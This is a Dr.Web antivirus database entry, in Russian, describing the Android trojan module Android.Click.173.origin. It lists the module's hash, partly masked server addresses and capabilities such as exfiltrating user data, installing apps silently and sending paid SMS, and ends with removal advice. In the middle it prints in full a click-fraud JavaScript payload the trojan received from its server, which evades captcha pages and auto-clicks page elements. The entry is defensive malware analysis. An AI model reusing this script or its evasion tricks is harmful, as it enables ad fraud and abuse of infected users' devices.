Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Android.Click.173.origin

Добавлен в вирусную базу Dr.Web: 2018-04-25

Описание добавлено:

SHA1:

  • 1f0776e3cb408839a876cf9e35a5c21dcec060a9

Детектирование троянских программных модулей (SDK) для ОС Android, выполняющих разнообразные вредоносные действия. Их скачивают и запускают другие троянские SDK, которые злоумышленники встраивают в различное ПО. Загрузка Android.Click.173.origin выполняется с сервера http://cdn.ads.go******.com/files/*. Авторами этих модулей могут быть разработчики троянских SDK Android.Gmobi.

Управляющий сервер Android.Click.173.origin расположен по адресу https://api.***mobi.com.

Android.Click.173.origin может выполнять следующие действия:

  • отправлять на сервер информацию о пользователе (включая данные о местоположении зараженного устройства, если у приложения, в которое встроен модуль, есть соответствующие полномочия);
  • незаметно загружать и устанавливать программы, если на устройстве имеется root-доступ или если у приложения, в которое встроен троянец, есть разрешение на скрытую установку (такое приложение должно находиться в системном разделе);
  • по заданию сервера отправлять широковещательные сообщения, открывать окна, запускать указанные в командах сервисы (например, для автоматического запуска установленных приложений);
  • отправлять СМС-сообщения для оплаты различных сервисов и услуг;
  • показывать рекламу;
  • загружать заданные сервером веб-страницы через WebView и симулировать переходы пользователя по ссылкам с помощью скачиваемых с управляющего сервера скриптов JavaScript. Например, от сервера был получен следующий скрипт:
var json = {
"cmd" : "getHtml",
"id" : "5ad9d7ef4efd4c0828472720",
"no" : 2,
"ctr" : 30,
"info" : "0.00:0/0/0.00",
"capture" : false,
"close" : true
}
function __click__(link)
{
if (!link){
waitAndClose();
return;
}
json.link = link.outerHTML;
if (link.click) {
link.click();
console.log("json://" + JSON.stringify(json))
return;
}
waitAndClose();
}
function waitAndClose(){
setTimeout(function(){
console.log("json://" + JSON.stringify(json))
}, 1000 * 10);
}
var html = document && document.documentElement && document.documentElement.outerHTML
var htmllc = html.toLowerCase()
var closing = false
function forceClose(){
closing = true
console.log("json://" + JSON.stringify({
'cmd' : 'close',
'close' : true
}))
}
Expand
source
function getAllTagOf(tag, eachCallback){
var html = ""
var items = document.getElementsByTagName(tag);
if (items && items.length > 0){
for(var i = 0; i < items.length; i++){
if (eachCallback) eachCallback(items[i])
html += items[i].outerHTML
}
}
return html
}
var gcc = atob('d3d3Lmdvb2dsZS5jb20vcmVjYXB0Y2hh')
var cc = atob('Y2FwdGNoYQ==')
var ch = atob('Y29pbmhpdmU=')
if (!htmllc){
} else if (htmllc.indexOf(gcc) != -1){
forceClose()
} else if (htmllc.indexOf(ch) != -1){
forceClose()
} else {
process()
}
function process(){
var all = document.querySelectorAll('button,a,input')
var links = [];
var CTR = json.ctr || 50;
if (closing){
console.log('Closing')
} else if (all.length == 0 || all.length > 10){
json.stop = 'all.length = ' + all.length;
waitAndClose();
} else {
var rnd = new Date().valueOf() % 100;
if (rnd > CTR){
json.stop = 'CTR : ' + rnd + ' > ' + CTR ;
waitAndClose();
} else {
var stop = false;
for(var i = 0; i < all.length; i++){
var item = all[i]
if ('A' == item.tagName){
item._text = item.innerText
links.push(item)
} else if ('BUTTON' == item.tagName){
if (item.type && item.type.toLowerCase() == 'submit'){
item._text = item.value
links.push(item)
}
} else if ('INPUT' == item.tagName){
var type = item.type && item.type.toLowerCase();
if (type == 'checkbox'){
item.checked = true
} else if (type == 'submit'){
item._text = item.value
links.push(item)
} else if (type == 'button'){
item._text = item.value
links.push(item)
} else if (type == 'hidden'){
} else if (type == 'reset'){
} else {
if (item._ignore){
 console.log('skip ' + item.outerHTML)
} else {
json.stop = item.outerHTML;
console.log('Stop :' + json.stop)
stop = true;
break;
}
}
}
}
if (stop || links.length == 0){
waitAndClose();
} else {
var timeout = new Date().valueOf() % 5 + 1;
var index = links.length == 1 ? 0 : (new Date().valueOf() % links.length)
json.action = {
index : index,
count : links.length,
tag : links[index].tagName,
text : links[index].innerText
}
console.log('Timeout : ' + timeout + " Index : " + index + "/" + links.length)
json.close = false;
setTimeout(function(){__click__(links[index])}, 1000 * timeout);
}
 }
}
}

Троянец взаимодействует с JavaScript на загружаемых страницах с помощью WebChromeClient.onConsoleMessage.

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке